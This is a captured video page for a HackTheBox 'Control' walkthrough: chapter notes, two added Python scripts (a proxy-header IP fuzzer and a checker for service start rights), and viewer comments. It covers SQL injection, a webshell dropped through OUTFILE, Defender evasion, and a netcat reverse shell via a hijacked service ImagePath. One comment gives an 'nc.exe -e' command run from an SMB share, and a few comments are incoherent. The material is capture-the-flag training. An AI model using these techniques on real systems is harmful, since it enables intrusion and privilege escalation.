HackTheBox - Control

36,615 views

IppSec

A day ago

00:00 - Start
01:02 - Begin of nmap
04:00 - Checking out the webpage, noticing an IP in the comments, and running GoBuster to discover /uploads/. Running GoBuster on /uploads/ looking for PHP files
07:50 - Begin fuzzing Proxy Headers with wfuzz to access admin.php
12:30 - Using Python's netaddr to generate an IP List based upon subnet, discovering X-Forwarded-For: 192.168.4.28 allows access to admin.php
15:30 - Having BurpSuite automatically add the x-forwarded-for header to our requests
16:45 - Explaining a reason why this header exists in the first place
19:25 - Discovering Union injection on the admin page
22:45 - Telling SQLMap to run in the background, while we manually enumerate this ourselves.
24:00 - Using Group_Concat to return multiple rows in a union injection and enumerate the INFORMATION_SCHEMA Database
33:30 - Using LOAD_FILE and TO_BASE64 in our SQL Injection to extract source code from the webserver
39:30 - Enumerating who has the FILE privilege in the database, showing SQLMAP gives us some bad info
48:50 - Grabbing user hashes out of the database with our injection then cracking them to discover hector's password
51:30 - Using OUTFILE in our injection to drop a php webshell to the server
58:05 - Having trouble getting a reverse shell back, assuming it is defender so changing the name of some functions to bypass it
1:04:02 - Using powershell to run a command as hector with the password we cracked from the database
1:08:15 - Running WinPEAS and going over what it finds, looks like it misses some permissions around editing services
1:14:30 - Looking at the PSReadLine directory to get some powershell history and a hint at enumerating permissions in the registry
1:15:40 - Running ConvertFrom-SddlString to make sense of the registry permissions
1:21:20 - Listing services on the box, then shrinking the number by only showing ones that run as LocalSystem with a Manual startup type
1:26:00 - Shrinking the list some more by only showing the services that our user has permission to start
1:35:30 - Showing that the "SC" command cannot set the BinPath of these services for our user; it has to be done via the registry, where our permissions allow it
1:38:00 - Changing the ImagePath of the wuauserv service in the registry via PowerShell
1:41:15 - Setting the ImagePath to be a reverse shell via netcat, then starting the service to get a shell as LocalSystem
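The header fuzzing from 07:50 to 15:30, as an added example that is not code from the video: the video pairs wfuzz with a netaddr-generated IP list, while this script uses only the Python standard library. A reverse proxy or load balancer normally adds X-Forwarded-For so the backend can see the real client address; the weakness exploited here is a backend that trusts that value from any client. The target URL, the header list and the /24 subnet are assumptions, and fake_send is a constructed stand-in for the real target so the script runs offline.

```python
"""Fuzz proxy-style headers with every host of a subnet, looking for the one
value that unlocks an IP-restricted page (the X-Forwarded-For trick).

Added example, not code from the video. Target URL, header list and subnet
are assumptions; fake_send is a constructed stand-in for real HTTP traffic.
"""
import ipaddress
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Iterator, List, Tuple

# Headers a naive "is this request from inside?" check might trust (assumed list;
# for a real run extend it with a wordlist such as SecLists' lower-case-headers).
PROXY_HEADERS = ("X-Forwarded-For", "X-Real-IP", "X-Client-IP",
                 "X-Originating-IP", "True-Client-IP", "X-Remote-Addr")

Response = Tuple[int, int]                        # (HTTP status, body length)
Sender = Callable[[str, Dict[str, str]], Response]


def candidate_ips(cidrs: Iterable[str]) -> Iterator[str]:
    """Yield every host address of each subnet, as netaddr's iter_hosts() does."""
    for cidr in cidrs:
        for host in ipaddress.ip_network(cidr, strict=False).hosts():
            yield str(host)


def http_send(url: str, headers: Dict[str, str]) -> Response:
    """Real sender: status plus body length, so a 200 'Access Denied' page is
    still distinguishable from the real admin page by size (wfuzz --hh style)."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def fake_send(url: str, headers: Dict[str, str]) -> Response:
    """Constructed stand-in for the target: only the right X-Forwarded-For value
    returns the admin page; everything else gets the short 'Access Denied' body."""
    if headers.get("X-Forwarded-For") == "192.168.4.28":
        return 200, 4096
    return 200, 13  # len("Access Denied")


def fuzz_proxy_headers(url: str, cidrs: Iterable[str], send: Sender = http_send,
                       headers: Iterable[str] = PROXY_HEADERS
                       ) -> List[Tuple[str, str, Response]]:
    """Return (header, ip, response) for every request whose response differs
    from the baseline request that carries no proxy header at all."""
    baseline = send(url, {})
    hits = []
    for ip in candidate_ips(cidrs):
        for header in headers:
            resp = send(url, {header: ip})
            if resp != baseline:
                hits.append((header, ip, resp))
    return hits


if __name__ == "__main__":
    # Hypothetical target; swap fake_send for http_send against a real host.
    for hit in fuzz_proxy_headers("http://target/admin.php", ["192.168.4.0/24"],
                                  send=fake_send):
        print(hit)
```

Once a hit is found, the rest of the session needs the header on every request, which is what the Burp step at 15:30 takes care of. Comparing the whole (status, length) pair rather than the status alone matters because many "Access Denied" pages are served with a 200.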
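The service-permission triage from 1:15:40 to 1:38:00, as an added example that is not code from the video. The video reads each service's security descriptor with ConvertFrom-SddlString; this Python script performs the same decision offline on the SDDL string that `sc.exe sdshow <service>` prints, listing which services a given token can start (RP, SERVICE_START) and showing why `sc config` fails for the same user (no DC, SERVICE_CHANGE_CONFIG). The SDDL strings in SAMPLE and the TOKEN set are constructed for the demo; the right codes and the well-known aliases (AU, BU, IU, WD) are the standard SDDL ones. The check walks the DACL in order the way AccessCheck does: a matching deny on a still-unsatisfied right fails immediately, and allows accumulate.

```python
"""Decide, from SDDL alone, which Windows services a given token may start.

Added example, not code from the video. Input is the descriptor that
`sc.exe sdshow <service>` prints; SAMPLE and TOKEN are constructed samples.
"""
import re
from typing import Dict, Iterable, List, NamedTuple

# SDDL two-letter access-right codes as they apply to service objects.
# (WD here is the WRITE_DAC right; WD in the SID position means Everyone.)
SERVICE_RIGHTS = {
    "CC": 0x00001,  # SERVICE_QUERY_CONFIG
    "DC": 0x00002,  # SERVICE_CHANGE_CONFIG  (what `sc config ... binPath=` needs)
    "LC": 0x00004,  # SERVICE_QUERY_STATUS
    "SW": 0x00008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00010,  # SERVICE_START
    "WP": 0x00020,  # SERVICE_STOP
    "DT": 0x00040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x00080,  # SERVICE_INTERROGATE
    "CR": 0x00100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x10000,  # DELETE
    "RC": 0x20000,  # READ_CONTROL
    "WD": 0x40000,  # WRITE_DAC
    "WO": 0x80000,  # WRITE_OWNER
    # Generic rights, pre-mapped through the service object's generic mapping.
    "GR": 0x2008D,  # READ_CONTROL | CC | LC | SW | LO
    "GW": 0x20002,  # READ_CONTROL | DC
    "GX": 0x20170,  # READ_CONTROL | RP | WP | DT | CR
    "GA": 0xF01FF,  # SERVICE_ALL_ACCESS
}

DACL_RE = re.compile(r"D:[^(]*((?:\([^)]*\))*)")  # "D:" + flags + ACEs, stops at S:
ACE_RE = re.compile(r"\(([^)]*)\)")


class Ace(NamedTuple):
    ace_type: str  # "A" = access allowed, "D" = access denied
    mask: int      # access mask the ACE grants or denies
    sid: str       # two-letter alias (AU, BU, ...) or a full S-1-5-... SID


def rights_mask(code: str) -> int:
    """Turn an SDDL rights field (two-letter codes or a hex number) into a bitmask."""
    if code.lower().startswith("0x"):
        return int(code, 16)
    if len(code) % 2:
        raise ValueError(f"odd-length rights field: {code!r}")
    mask = 0
    for i in range(0, len(code), 2):
        mask |= SERVICE_RIGHTS[code[i:i + 2]]
    return mask


def parse_dacl(sddl: str) -> List[Ace]:
    """Extract the DACL ACEs in order; SACL (S:) audit ACEs are ignored."""
    match = DACL_RE.search(sddl)
    if not match:
        return []  # no DACL in the string: treated as deny-all below
    aces = []
    for body in ACE_RE.findall(match.group(1)):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;sid
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {body!r}")
        aces.append(Ace(fields[0], rights_mask(fields[2]), fields[5]))
    return aces


def access_check(aces: List[Ace], token_sids: Iterable[str], wanted: int) -> bool:
    """First-match walk over a canonical DACL, like the kernel's AccessCheck:
    a deny covering a not-yet-granted wanted bit fails at once, allows accumulate."""
    sids = set(token_sids)
    granted = 0
    for ace in aces:
        if ace.sid not in sids:
            continue
        remaining = wanted & ~granted
        if ace.ace_type == "D" and ace.mask & remaining:
            return False
        if ace.ace_type == "A":
            granted |= ace.mask & wanted
            if granted == wanted:
                return True
    return granted == wanted


def services_with_right(service_sddl: Dict[str, str], token_sids: Iterable[str],
                        right: str = "RP") -> List[str]:
    """Names of services on which the token holds the given right (default: start)."""
    wanted = SERVICE_RIGHTS[right]
    return sorted(name for name, sddl in service_sddl.items()
                  if access_check(parse_dacl(sddl), token_sids, wanted))


# Constructed sample descriptors in the shape `sc.exe sdshow` prints them.
SAMPLE = {
    "svcLocked": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                 "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "svcStartable": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;CCLCSWRPLOCRRC;;;AU)",
    "svcDenied": "D:(D;;RP;;;AU)(A;;CCLCSWRPWPLOCRRC;;;AU)"
                 "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)",
    "svcHexExecute": "D:(A;;0x20170;;;BU)",  # GENERIC_EXECUTE written out as hex
}
# Constructed token of a non-admin user: well-known aliases plus the user's own SID.
TOKEN = {"AU", "BU", "IU", "WD", "S-1-5-21-111-222-333-1001"}

if __name__ == "__main__":
    print("can start:        ", services_with_right(SAMPLE, TOKEN, "RP"))
    print("can change config:", services_with_right(SAMPLE, TOKEN, "DC"))
```

To use it on a real host, collect `sc.exe sdshow <name>` for each candidate from the LocalSystem/Manual list built at 1:21:20 and feed the strings in as the dictionary values; a service that appears under RP but not under DC is exactly the case in the video, where the binary path has to be changed through the service's registry key instead of `sc config`.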

Comments: 55
@franciscorivera5396 4 years ago
The video is very complete. Thanks IPPSEC!! For wfuzz I used a list of SecLists headers: SecLists/Discovery/Web-Content/BurpSuite-ParamMiner/lower-case-headers with -H "FUZZ: 192.168.4.28"
@DaObvious1 4 years ago
You can go into the preferences in CherryTree and disable the curly quotes: Edit/Preferences/Text and uncheck the "Enable Smart Quotes Auto Replacement" box. I also have had hours wasted due to curly quotes lol. Great video! sqlmap can upload files to the box with the --file-write --file-dest flags. Glad you did it manually because I learned a lot more that way. U Da Man!
@letronghoangminh425 2 years ago
First time commenting on your video. Great knowledge learned about Windows services.
@pwndumb2903 4 years ago
Amazing video. The explanation about the registry and services is awesome.
@brettnieman3453 4 years ago
Thanks for the great content as always! Actually didn't know you could fuzz a second parameter in wfuzz -- thanks!!!
@isectech 4 years ago
@ippsec you said HackTheBox is rotating the flags but mine was the same as your flag. Let me say thank you again for all you have done for us.
@ramarcr9454 4 years ago
I have searched so much for this X-Forwarded method and finally you show it. You are a great man! Give me a copy of your brain :D :P
@EvilSapphireR 4 years ago
This is the most accessible, and downright the COOLEST video on hacking I've ever seen! As someone who's trying to get into malware analysis, this channel may just make me start preparing for my OSCP as well! So thankful for content like this on KZfaq!
@michaelyadidya8742 4 years ago
I am gonna be honest, the manual way just blew me away! You crazy ippy! Keep cracking!
@JonJon2040 4 years ago
A couple of cool things I found out you can do on a Windows machine (for file IO and shells): 1. For uploading/downloading files, you can open an SMB share on your machine and use \\IP\share to access your files from the Windows machine. 2. You can run nc.exe from your share in a webshell. For example, typing this in a webshell: \\IP\share\nc.exe -e blabla will result in netcat being executed without Defender killing it
@JonJon2040 4 years ago
I just find it more comfortable to use an SMB share instead of an HTTP server (which makes moving files from the remote machine to your local machine complicated)
@westernvibes1267 4 years ago
I got lucky, I saw a blog post about X-Forwarded-For the day before I attempted the box. After that it was straightforward. Great video
@xxxvenmxxx2269 4 years ago
Thank you for making this video.🙂
@yantingliu4722 4 years ago
Thanks a lot!! I'm looking forward to seeing more of it
@alientec258 4 years ago
Thank you for your very good work, good video... thx :)
@sakettestsakettest8009 4 years ago
This is awesome 👏 as usual. Fun fact: the moment he says "I have wasted a lot of time in my life dealing with weird quotes" (Me: also with ping -n / ping -c 1) 🤣😂🤣
@utku_yucel 4 years ago
You are the best, Thanks!
@Ms.Robot. 4 years ago
Sweet! 💗🧜‍♀️🧚‍♀️
@adv4170 4 years ago
Your MySQL starts with --skip-grant-tables or secure_file_priv="", that's why it ignores the FILE privileges maybe.
@mehul050 4 years ago
The only person whose "Please Subscribe and Support me on xyz" doesn't bother me at all
@jack_brannan 4 years ago
Thanks, Ippsec
@magnfiyerlmoro3301 2 years ago
So why didn't WinPEAS do the enumeration in a good way?
@jwouter 4 years ago
Would love to see you do a video on antivirus (Windows Defender) evasion; that little trick opened my eyes..... I usually just copy over nc to get my shell on a Defender-protected box..... keep up the great videos 😇
@ippsec 4 years ago
There is one, and it's specifically on Defender...
@jwouter 4 years ago
🤓 Must have missed it, thanks, will check that out tomorrow
@Ivo-- 4 years ago
I generally use directory-list-lowercase-2.3-medium.txt when the server is Windows. It's faster and there are no multiple hits.
@ippsec 4 years ago
Good call.
@sidahmed5784 4 years ago
It's just a little confusion. IS_GRANTABLE means that you can grant this permission that you have. Take a look at the docs here: dev.mysql.com/doc/refman/8.0/en/user-privileges-table.html dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_grant-option So seeing IS_GRANTABLE: NO just means you can't grant this permission to another user.
@jwouter 4 years ago
Interesting. Why don't you run an nmap -p- and a top 100 for UDP ports as a default part of your enumeration? Or is this purely for the video?
@ippsec 4 years ago
I do things like that on the easy boxes, which I haven't done before. I don't always show it because it eats up time for no reason, and it's pretty rare for an HTB box to put something on a non-standard port
@jwouter 4 years ago
IppSec fair enough. I did scan all ports and used the open WinRM port to get a shell as Hector, didn't go through the LFI nor the PowerShell reverse shell 🤓
@DFLMN 4 years ago
!!PowerShell interesting information!!
PS> (Get-Acl).AccessToString - I think this is a much easier way to read an ACL
PS> (gwmi Win32_OperatingSystem).Caption - maybe this Windows version detection method would be useful
PS> Get-HotFix - this will show you all installed hotfixes
@LordMogrein 4 years ago
48:24 - actually sqlmap said Y (you can count the 8th field here - 45:41). I think N happened because sqlmap cracked and showed manager's password. Then awk considered the password column for manager as 2 fields and wrongly counted the 8th field.
@jwouter 4 years ago
Why not use the lowercase wordlist? Any reason to still use the full list?
@ippsec 4 years ago
Just habit. The lowercase one would be better.
@mdshahidurrahman8111 4 years ago
♥️
@marcvandenbroeck3792 4 years ago
the traffic comes out the http session the eventhandler in the DOM has a callback on promise to id="html"; once the session gets a MITM the browser collapse the DOM and the value is zero , check the session F12, the symlink uses cache on symbols in the SVG off the html5
@magnfiyerlmoro3301 2 years ago
Hi, when I tried all the services in my variable canStart I could not modify the ImagePath, as PowerShell tells me access denied to the registry due to security permissions. It's really weird, can someone help me? I thought it was OK for AU users to modify such things in the registry
@anonymousanonymous6406 4 years ago
IPPSEC rocks
@mr.roboter 2 years ago
Thank you, dear ippsec teacher sir. May I ask a question? How can I bypass the SSL error (TLS version) in an sqlmap attack? Please teach me.
@ippsec 2 years ago
Maybe try typing sqlmap ssl in ippsec.rocks
@marcvandenbroeck3792 4 years ago
check the php, magiccsrf.js, the cache runs on a win .lnk with a xmlhttps uri session in the loopback facing 8.8..8.0/24 underlying 10.10.10.10 but in binary the host 010.010.010.010 ==>8.8.8.8 ==> 8888, the session runs out the scope due the ip runs in NETLINK II , as censio gave, the sql comes from the browser indexDB
@semassalucdeo-gracias7559 3 years ago
Thank you for the nice video. I am getting this error when trying to start a service after editing the ImagePath:
PS HKLM:\SYSTEM\CurrentControlSet\Services\> start-service : Service 'DevicesFlow (DevicesFlowUserSvc)' cannot be started due to the following error: Cannot start service DevicesFlowUserSvc on computer '.'.
@semassalucdeo-gracias7559 3 years ago
I edited the path doing Set-ItemProperty -Path DevicesFlowUserSvc -Name ImagePath -Value "C:\Windows\Temp\test\prometheus.exe" and it worked fine
@mohammadabdussamad2258 4 years ago
There's another Windows box which is vulnerable to this privesc.. but you have to hop three users 😉😉😉
@IteLuis 4 years ago
Yeah, I know which box you are talking about XD...
@MD4564 4 years ago
Any chance we can get a Burp Suite tutorial? I'm finding it hard to use this tool.
@b3twiise853 4 years ago
First!
@yakushitamahacka4199 4 years ago
Windows Defender blocking strings.... this defence is not only useless but can also be abused in some cases for information leakage. Please, AVs, be better than Defender....
@Reelix 4 years ago
File modification (through detected strings or otherwise) is an extremely common bypass that works with all non-heuristic anti-viruses (which themselves are so unreliable that they mark anything with the ability to update as malware). Anti-viruses generally only detect what's in their DB, so anything custom-made will bypass them.
@yakushitamahacka4199 4 years ago
@@Reelix From what I remember most AVs also have some heuristics in addition to blacklisting. Some even mark self-signed exes as suspicious or check the icons. I am not sure if they also perform sandbox execution by default. Generally really trivial to bypass like you said if you make your own malware. Of course things may be different for enterprise customers, or I hope so at least.